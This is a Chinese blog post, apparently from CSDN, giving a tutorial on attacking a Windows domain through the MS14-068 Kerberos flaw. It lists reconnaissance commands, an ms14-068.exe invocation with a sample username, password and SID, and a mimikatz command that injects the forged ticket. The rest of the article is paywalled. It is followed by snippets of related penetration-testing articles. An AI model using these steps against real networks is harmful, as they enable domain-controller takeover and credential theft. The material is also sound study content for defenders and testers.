内网渗透-域渗透的记录

最新推荐文章于 2025-06-18 17:29:31 发布
原创 最新推荐文章于 2025-06-18 17:29:31 发布 · 1.2k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透 #内网渗透 #域控

本文详细介绍了如何利用MS14-068漏洞进行内网渗透,从获取普通域用户权限开始,通过Klist、mimikatz等工具进行票证操作,实现域控提权。接着,利用Psexec进行HASH传递攻击,并通过dcsync命令获取域内用户HASH信息。最后,讲述了如何生成和利用黄金票证维持管理员权限,整个过程深入浅出,涉及多种安全攻防技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MS14-068漏洞提权(限制条件:打了补丁或者域中有Win2012/2012R2的域控):
首先,需要拥有一台域内普通用户(假设为用户A)账户权限,知道此账户的账号密码。然后依次执行如下命令
1.
Ipconfig /all //查询本机IP段,所在域等;记录所在的域的名字

Net group “domain controllers” /domain 查看域控制器

所以所在的域全名 WIN-DTHKV3MCSKH.dc.com
2.
Klist purge //清除本机所有票证

Whoami /all //查询SID值 ,记录SID值

利用工具包中(工具包在文章末尾提供下载-内有详细的图文说明)的MS14-068.exe 执行如下命令
“ms14-068.exe -u lisi@dc.com -p “1qaz@WSX” -s S-1-5-21-1382597820-942189592-943616189-1104 -d WIN-DTHKV3MCSKH.dc.com
-u 域用户名
-p 域用户密码
-s 记录的SID
-d 域控名字”
之后会在此软件同目录下生成一个名为TGT_kim@contoso.com.ccache 的票证;

利用mimikatz将票证注入内存中:
mimikatz.exe “kerberos::ptc TGT_lisi@dc.com.ccache” exit

最低0.47元/天 解锁文章

200万优质内容无限畅学
内网渗透-内的权限维持
lza20001103的博客
10-01 1209
内的权限维持 文章目录内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
内网渗透-环境的搭建
lza20001103的博客
05-08 1800
环境的搭建
网络渗透笔记
weixin_67832238的博客
03-08 4809
第一章 渗透测试之信息收集 进行渗透测试之前,最重要的一步就是信息收集,在这个阶段,我们要尽可能地收集目标组织的信息。在信息收集中,追主要的就是收集服务器的配置信息和网站的敏感信息,其中包括名与子名信息、目标网站系统、CMS指纹、目标网站真实IP、开放的端口等。 1.1收集名信息 知道名信息后,我们要做的第一件事就是获取名的注册信息,包括该名的DNS服务器信息和注册人的联系信息等。 名信息收集的常用方法? 1.1.1 Whois查询 whois是一个标准的互联网协议,可用于收集网络
内网渗透-域渗透
qq_44806973的博客
11-23 5682
内网渗透(域渗透) 基础指南
99%的人不知道的内网渗透域渗透的区别和方式,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
06-18 567
内网渗透的攻击目标是内网中的任意主机,而域渗透的攻击目标是制器。:攻击者首先需要收集有关目标内网的信息,例如:网络拓扑、操作系统版本、软件版本、安全漏洞等。内网渗透域渗透是复杂的技术,需要攻击者具备扎实的网络安全知识和实践经验。内网渗透域渗透都是网络安全领中的重要概念,它们都涉及到攻击者在内网中获取权限的过程。然而,两者之间也存在一些区别。:攻击者需要找到一个可以进入内网的途径,例如:利用已知漏洞、社会工程、物理攻击等。:攻击者可以使用各种技术来提升自己的权限,例如:利用漏洞、本地提权、后门等。
内网渗透域渗透
枫梓林のBlog
06-01 1491
内网渗透域渗透 文章目录内网渗透域渗透0x01 环境介绍1.实验环境靶场2.环境初始化3.Kali 环境准备0x02 WebLogic 漏洞利用并 getshell1.信息收集2.利用 CVE-2019-27250x03 域渗透-横向渗透获取最高权限1.Cobalt Strike 介绍2.Cobalt Strike 部署3.创建监听4.上传相关利用工具5.反弹 system 权限的 shell 给cs 服务6.明文读取密码7.信息收集8.通过凭证连接反弹 shell9.小结0x04内网
内网渗透-完整的域渗透
Love&Share
11-28 1万+
文章目录环境概念创建创建组&用户加入域渗透常规信息收集内网信息收集拿下20031.MySQL弱口令2.哈希传递攻击拿下信息收集mimikatz后渗透&其他MSF其他模块推荐阅读: 环境 在开始域渗透之前,先来简单了解下的一些概念 概念 (Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个中,一个中的用户无法访问另一个中的资源) 工作组的分散管理模式不适合大型的网络环境下工作,模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和.
内网渗透域渗透.pdf
08-07
高级域渗透技巧包括但不限于:环境判断、弱点分析、中间人攻击(MITM)、假冒令牌攻击、键盘记录器等。这些技巧需要攻击者具备高水平的技术知识和实际操作经验,以及对目标网络和系统的深入了解。 ### 总结 内网...
内网渗透讲义-精选.zip
09-24
内容涵盖了结构、AD和DC的管理、内网跨边界应用、用户HASH抓取与破解、密码记录工具、常见漏洞扫描、第三方网络服务攻击(如SQL Server、MySQL、Web服务等)、ARP和DNS欺骗攻击等内容,并给出了具体的工具使用及...
内网渗透中的思路之一
05-01
在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到这样一种特殊的网络环境,而在环境下的内网渗透又将是另外一片天 地。
渗透实战:内网域渗透
热门推荐
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
内网环境渗透
谢公子的博客
07-26 1万+
目录 环境渗透 辨别当前用户是本地用户还是用户? 本地用户 用户 信息收集 查询的主机名 定位管理员 查找管理员进程 模拟管理员 内网横向渗透 信息获取(NTDS.dit) 权限维持 当我们通过代理进入内网,并且通过信息收集已经得知当前处于环境下。 环境渗透 域渗透目的:获得管理员账号,登录,进而内所有主机 域渗透的思路:先获取...
内网渗透-域渗透简单思路
weixin_44110913的博客
10-16 4630
文章目录1.权限提升2.渗透姿势爆hash,爆aes key爆hash爆aes key3.远程登录注册表修改连接命令4.连接操作PTH攻击(利用明文或hash连接)IPC(明文连接主机)WMI(利用明文连接)SMB(利用明文或hash连接)RDP(利用明文或hash连接)WMI工具(利用明文或hash连接)PTK攻击(aes key 进行连接)PTT攻击(权限维持)Golden ticket(黄金票据)silver ticket(白银票据)5.bat批量连接测试 1.权限提升 一开始一定要提到admini
内网渗透:一次完整的域渗透-网络安全(黑客)自学
MachineGunJoe666
03-18 1591
在开始域渗透之前,先来简单了解下的一些概念(Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个中,一个中的用户无法访问另一个中的资源)工作组的分散管理模式不适合大型的网络环境下工作,模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和安全策略的计算机集合。中集中存储用户账号的计算机就是器,中用户账号,计算机账号和安全策略被存储在制器上一个名为Active Directory的数据库中。
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
说一下内网渗透域渗透的一个区别和渗透方式,从零基础到精通,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
02-22 557
内网渗透域渗透都是网络安全领中的重要概念,它们都涉及到攻击者在内网中获取权限的过程。然而,两者之间也存在一些区别。
内网渗透思路05之一次完整的域渗透
划水的小白白
03-07 2086
7.1 拿到内网中一台机器的权限(一般是低权限)。 7.2 提取当前机器,但是失败 7.3 横向扫描内网其他机器存活 7.4 对存活机器进行常用端口探测 7.5 爆破mysql 7.6 通过数据库直接提权拿下内网中另一个机器 7.7 通过新的机器收集中的一些信息,获取到的明文账户密码 7.8 先通过msf获取到的会话,在找个合适的机会登录 7.9 增加内网路由,配置socks代理 7.10 远程桌面登录 7.11 一些其他补充
黑客内网渗透技术解析
"内网渗透常用手法" 内网渗透是黑客攻击的一种策略,通常发生在攻击者已经突破了外层防御并进入内部网络之后。在安全措施日益增强的今天,外网渗透变得越来越困难,因此内网渗透成为黑客寻找敏感信息和制目标系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值